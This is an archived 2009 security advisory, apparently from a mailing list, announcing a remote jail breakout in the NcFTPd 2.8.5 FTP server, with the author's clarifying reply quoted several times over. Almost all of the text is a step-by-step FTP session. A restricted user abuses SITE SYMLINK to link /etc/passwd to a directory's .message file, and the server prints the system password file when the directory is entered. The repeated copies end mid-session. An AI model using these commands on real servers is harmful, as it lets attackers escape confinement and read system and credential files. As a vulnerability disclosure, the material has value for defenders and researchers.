NcFTPd <= 2.8.5 remote jail breakout

NcFTPd <=3D 2.8.5 remote jail breakout

Discovered by:
	Kingcope
	Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
	27th July 2009

Greetings:
	Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
	Valid user account.
=09
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp=
 $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nolo=
gin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nolo=
gin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on freebsd you can symlink directories like =B4/=B4

Cheerio,

Kingcope


Replies to this exploit:

From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
